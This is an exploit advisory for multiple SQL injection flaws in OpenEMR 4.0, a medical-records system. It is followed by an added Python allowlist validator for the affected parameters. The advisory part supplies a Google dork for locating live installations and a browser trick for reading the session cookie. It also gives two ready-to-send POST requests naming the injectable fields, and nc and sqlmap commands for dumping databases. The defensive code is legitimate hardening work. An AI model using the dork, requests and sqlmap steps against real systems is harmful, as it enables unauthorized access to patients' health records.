Open EMR version 4.0 suffers from multiple remote SQL injection vulnerabilities.
# Exploit Title: Open EMR
# Google Dork: inurl:"/interface/login/login_frame.php" intitle:"Login" intext:"Username:"
# Date: 3 / 08 / 2011
# Author: Mehdi Boukazoula ; Houssam Sahli
# Software Link (with patch): https://www.oemr.org/wiki/OpenEMR_Downloads
# Version: v 4.0, fully patched
# Tested on: v 4.0
# Description: An authenticated user can exploit this vulnerability by reading the session cookie from the browser (for example with the URL javascript:alert(document.cookie)), putting it into the request file together with the SQL command, and sending the request:
root@# cat request.txt | nc -vv yourhost 80
or simply use sqlmap like this:
root@# sqlmap -r request.txt -p "YOUR PARAMETER" --dbs
--------------------------------------------------------------------------------------------------------
---Request1: Affected parameters: provider_id, pc_category
POST https://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1
Accept-language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-encoding: identity
Keep-alive: 115
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10
Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Host: 127.0.0.1
Referer: https://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search
Cookie: PUT-THE-COOKIE-HERE
Content-type: application/x-www-form-urlencoded
Proxy-connection: keep-alive

pc_keywords=bob&provider_id=_ALL_&end=08/10/2011&pc_category=&submit=Submit&start=08/03/2011&pc_keywords_andor=AND&pc_facility=
--------------------------------------------------------------
---Request2: Affected parameters: form_patient_id
POST https://127.0.0.1/openemr/interface/reports/chart_location_activity.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: https://127.0.0.1/openemr/interface/reports/chart_location_activity.php
Cookie: PUT-THE-COOKIE-HERE
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

form_refresh=true&form_patient_id=patient
---------------------------------------------------------------
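As a defensive counterpart to the two requests above, an added example (not part of this advisory or of OpenEMR) that checks the three listed parameters against a strict allowlist before they could reach any query; it assumes provider and patient ids are integers, which the advisory does not state. Note that the advisory's own Request2 carries the placeholder value `patient`, which the integer rule rejects as well.

```python
import re
from urllib.parse import parse_qs

# Allowlist for the three parameters the advisory names. Assumption, not stated
# on the page: OpenEMR provider and patient ids are integers, provider_id may
# also be the literal "_ALL_" (seen in Request1), and pc_category may be empty.
ALLOWED = {
    "provider_id": re.compile(r"(_ALL_|[0-9]{1,10})"),
    "pc_category": re.compile(r"([0-9]{1,10})?"),
    "form_patient_id": re.compile(r"[0-9]{1,10}"),
}

# Request bodies: the first two are copied from the advisory, the last two are
# constructed tampered variants. A single quote is enough to fail the allowlist,
# so no knowledge of any specific payload is needed for the check to work.
REQUEST1_BODY = ("pc_keywords=bob&provider_id=_ALL_&end=08/10/2011&pc_category="
                 "&submit=Submit&start=08/03/2011&pc_keywords_andor=AND&pc_facility=")
REQUEST2_BODY = "form_refresh=true&form_patient_id=patient"
TAMPERED1_BODY = REQUEST1_BODY.replace("provider_id=_ALL_", "provider_id=_ALL_%27")
TAMPERED2_BODY = "form_refresh=true&form_patient_id=7%27"


def validate_body(body: str) -> dict:
    """Parse a form-encoded POST body and return {name: decoded_value} for each
    allowlisted parameter whose value does not match. An empty dict means the
    body is accepted. Validation runs on the percent-decoded value, i.e. the
    same form the application would hand to its SQL layer."""
    fields = parse_qs(body, keep_blank_values=True)
    rejected = {}
    for name, pattern in ALLOWED.items():
        for value in fields.get(name, []):
            if pattern.fullmatch(value) is None:
                rejected[name] = value
                break  # one offending value per parameter is enough to reject
    return rejected


if __name__ == "__main__":
    for label, body in [("Request1", REQUEST1_BODY), ("Request2", REQUEST2_BODY),
                        ("Tampered1", TAMPERED1_BODY), ("Tampered2", TAMPERED2_BODY)]:
        bad = validate_body(body)
        print(f"{label}: {'accepted' if not bad else 'rejected ' + str(bad)}")
```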